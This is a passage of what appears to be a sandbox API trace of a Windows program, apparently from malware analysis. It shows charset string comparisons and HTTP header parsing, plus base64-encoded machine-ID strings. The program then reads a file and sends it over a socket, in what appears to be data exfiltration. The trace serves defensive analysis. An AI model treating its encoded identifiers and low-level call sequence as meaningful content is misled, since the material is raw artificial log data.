lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO58GB231280", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NS_4551-1", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-60", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-NO", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO60DanishNorwegian", cchCount1=22, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO60Norwegian1", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NS_4551-2", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-NO2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-61", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no2", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO61Norwegian2", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NF_Z_62-010", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-69", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-FR", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fr", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO69French", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="videotex-suppl", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 3 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-70", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO70VideotexSupp1", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PT2", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-84", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-PT2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO84Portuguese2", cchCount1=18, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ES2", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-85", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-ES2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO85Spanish2", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSZ_7795.3", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-86", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-HU", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hu", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO86Hungarian", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6226-1983", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-87", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x0208", cchCount1=5, lpString2="UTF-8", cchCount2=5) returned 3 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_X0208-1983", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO87JISX0208", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="greek7", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-88", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO88Greek7", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASMO_449", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_9036", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="arabic7", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-89", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO89ASMO449", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-90", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO90", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-a", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-91", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-a", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO91JISC62291984a", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-b", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-92", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-JP-OCR-B", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-b", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO92JISC62991984b", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-b-add", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-93", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-b-add", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO93JIS62291984badd", cchCount1=22, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-hand", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-94", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-hand", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO94JIS62291984hand", cchCount1=22, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-hand-add", cchCount1=23, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-95", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-hand-add", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO95JIS62291984handadd", cchCount1=25, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-kana", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-96", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO96JISC62291984kana", cchCount1=23, lpString2="UTF-8", cchCount2=5) returned 1 [0105.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_2033-1983", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-98", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e13b", cchCount1=4, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2033", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANSI_X3.110-1983", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-99", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CSA_T500-1983", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAPLPS", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO99NAPLPS", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-1:1987", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-100", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin1", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l1", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NkYwNTk0OUQyMzZGOUEyRTc3RTYwNjQ2M0Y3MUQzMDI4RUU5M0E0Qjc4QkY2M0Q3OEY4NDBBRDhENUNBNkM3RkREMDU4NEE5RkRCMzkyQzdEMTEwM0FDMTExOTYwREM2NEQ4QjMwRTM3QzUzQUU3MjU4MUMzREM4MURCRTk1MUQwNTVCRjlGODc0MTc5NzdGNzlDMjNEMzIyRTdFQUZGQjJDMUMyMjI4NEM0Qzg3QkY1QkJENjNENkY5MkYxRjg2NTUwREUyOTZCQjM0MkNGN0MxMjQzREIxMTNFMUUxRUYxREEwRTY4MjBCMURFMDZBRTZEOEQ1RDRBQTZEMkZEODRGNjVDQ0FFRkQ4RjlEMjhCMEZCMjkwN0I4QUI3NDJFNkE2NTcxNkM5ODNDMzU=", cchWideChar=404, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 404 [0105.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NkYwNTk0OUQyMzZGOUEyRTc3RTYwNjQ2M0Y3MUQzMDI4RUU5M0E0Qjc4QkY2M0Q3OEY4NDBBRDhENUNBNkM3RkREMDU4NEE5RkRCMzkyQzdEMTEwM0FDMTExOTYwREM2NEQ4QjMwRTM3QzUzQUU3MjU4MUMzREM4MURCRTk1MUQwNTVCRjlGODc0MTc5NzdGNzlDMjNEMzIyRTdFQUZGQjJDMUMyMjI4NEM0Qzg3QkY1QkJENjNENkY5MkYxRjg2NTUwREUyOTZCQjM0MkNGN0MxMjQzREIxMTNFMUUxRUYxREEwRTY4MjBCMURFMDZBRTZEOEQ1RDRBQTZEMkZEODRGNjVDQ0FFRkQ4RjlEMjhCMEZCMjkwN0I4QUI3NDJFNkE2NTcxNkM5ODNDMzU=", cchWideChar=404, lpMultiByteStr=0x240fe08, cbMultiByte=404, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NkYwNTk0OUQyMzZGOUEyRTc3RTYwNjQ2M0Y3MUQzMDI4RUU5M0E0Qjc4QkY2M0Q3OEY4NDBBRDhENUNBNkM3RkREMDU4NEE5RkRCMzkyQzdEMTEwM0FDMTExOTYwREM2NEQ4QjMwRTM3QzUzQUU3MjU4MUMzREM4MURCRTk1MUQwNTVCRjlGODc0MTc5NzdGNzlDMjNEMzIyRTdFQUZGQjJDMUMyMjI4NEM0Qzg3QkY1QkJENjNENkY5MkYxRjg2NTUwREUyOTZCQjM0MkNGN0MxMjQzREIxMTNFMUUxRUYxREEwRTY4MjBCMURFMDZBRTZEOEQ1RDRBQTZEMkZEODRGNjVDQ0FFRkQ4RjlEMjhCMEZCMjkwN0I4QUI3NDJFNkE2NTcxNkM5ODNDMzU=", lpUsedDefaultChar=0x0) returned 404 [0105.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0105.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=", cchWideChar=84, lpMultiByteStr=0x24ae4a8, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=\x01", lpUsedDefaultChar=0x0) returned 84 [0105.174] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19faec*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19faec*=0) returned 0x0 [0105.174] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19faec*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19faec*=0) returned 0x12b5 [0105.174] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19faec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19faec*=0) returned 0x0 [0105.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NkYwNTk0OUQyMzZGOUEyRTc3RTYwNjQ2M0Y3MUQzMDI4RUU5M0E0Qjc4QkY2M0Q3OEY4NDBBRDhENUNBNkM3RkREMDU4NEE5RkRCMzkyQzdEMTEwM0FDMTExOTYwREM2NEQ4QjMwRTM3QzUzQUU3MjU4MUMzREM4MURCRTk1MUQwNTVCRjlGODc0MTc5NzdGNzlDMjNEMzIyRTdFQUZGQjJDMUMyMjI4NEM0Qzg3QkY1QkJENjNENkY5MkYxRjg2NTUwREUyOTZCQjM0MkNGN0MxMjQzREIxMTNFMUUxRUYxREEwRTY4MjBCMURFMDZBRTZEOEQ1RDRBQTZEMkZEODRGNjVDQ0FFRkQ4RjlEMjhCMEZCMjkwN0I4QUI3NDJFNkE2NTcxNkM5ODNDMzU=", cchWideChar=404, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 404 [0105.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NkYwNTk0OUQyMzZGOUEyRTc3RTYwNjQ2M0Y3MUQzMDI4RUU5M0E0Qjc4QkY2M0Q3OEY4NDBBRDhENUNBNkM3RkREMDU4NEE5RkRCMzkyQzdEMTEwM0FDMTExOTYwREM2NEQ4QjMwRTM3QzUzQUU3MjU4MUMzREM4MURCRTk1MUQwNTVCRjlGODc0MTc5NzdGNzlDMjNEMzIyRTdFQUZGQjJDMUMyMjI4NEM0Qzg3QkY1QkJENjNENkY5MkYxRjg2NTUwREUyOTZCQjM0MkNGN0MxMjQzREIxMTNFMUUxRUYxREEwRTY4MjBCMURFMDZBRTZEOEQ1RDRBQTZEMkZEODRGNjVDQ0FFRkQ4RjlEMjhCMEZCMjkwN0I4QUI3NDJFNkE2NTcxNkM5ODNDMzU=", cchWideChar=404, lpMultiByteStr=0x240fe08, cbMultiByte=404, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NkYwNTk0OUQyMzZGOUEyRTc3RTYwNjQ2M0Y3MUQzMDI4RUU5M0E0Qjc4QkY2M0Q3OEY4NDBBRDhENUNBNkM3RkREMDU4NEE5RkRCMzkyQzdEMTEwM0FDMTExOTYwREM2NEQ4QjMwRTM3QzUzQUU3MjU4MUMzREM4MURCRTk1MUQwNTVCRjlGODc0MTc5NzdGNzlDMjNEMzIyRTdFQUZGQjJDMUMyMjI4NEM0Qzg3QkY1QkJENjNENkY5MkYxRjg2NTUwREUyOTZCQjM0MkNGN0MxMjQzREIxMTNFMUUxRUYxREEwRTY4MjBCMURFMDZBRTZEOEQ1RDRBQTZEMkZEODRGNjVDQ0FFRkQ4RjlEMjhCMEZCMjkwN0I4QUI3NDJFNkE2NTcxNkM5ODNDMzU=", lpUsedDefaultChar=0x0) returned 404 [0105.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0105.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=", cchWideChar=84, lpMultiByteStr=0x24ae4a8, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=\x01", lpUsedDefaultChar=0x0) returned 84 [0105.175] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fa84*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19fa84*=0) returned 0x0 [0105.175] ReadFile (in: hFile=0x3d0, lpBuffer=0x23cad8e, nNumberOfBytesToRead=0x12d4, lpNumberOfBytesRead=0x19fabc, lpOverlapped=0x0 | out: lpBuffer=0x23cad8e*, lpNumberOfBytesRead=0x19fabc*=0x12b5, lpOverlapped=0x0) returned 1 [0105.176] ReadFile (in: hFile=0x3d0, lpBuffer=0x23cc043, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x19fabc, lpOverlapped=0x0 | out: lpBuffer=0x23cc043*, lpNumberOfBytesRead=0x19fabc*=0x0, lpOverlapped=0x0) returned 1 [0105.176] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fabc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19fabc*=0) returned 0x0 [0105.176] send (s=0x3f0, buf=0x23c2ad8*, len=5466, flags=0) returned 5466 [0105.176] GetTickCount64 () returned 0x115b93a [0105.176] select (in: nfds=0, readfds=0x19fa24, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19fa24, writefds=0x0, exceptfds=0x0) returned 1 [0105.954] recv (in: s=0x3f0, buf=0x23c2ad8, len=32768, flags=0 | out: buf=0x23c2ad8*) returned 131 [0105.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0105.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0105.954] GetTickCount64 () returned 0x115bc57 [0105.954] GetTickCount64 () returned 0x115bc57 [0105.954] GetTickCount64 () returned 0x115bc57 [0105.954] GetTickCount64 () returned 0x115bc57 [0105.954] GetTickCount64 () returned 0x115bc57 [0105.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0105.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Cache-control", cchCount2=13) returned 3 [0105.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Connection", cchCount2=10) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Connection", cchCount2=10) returned 2 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 1 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 1 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 1 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 1 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Type", cchCount2=12) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Type", cchCount2=12) returned 1 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-8", cchCount1=1, lpString2="\"", cchCount2=1) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="charset=UTF-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0105.955] GetCurrentThreadId () returned 0x1358 [0105.955] GetCurrentThreadId () returned 0x1358 [0105.955] GetCurrentThreadId () returned 0x1358 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 1 [0105.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0105.956] CompareStringW 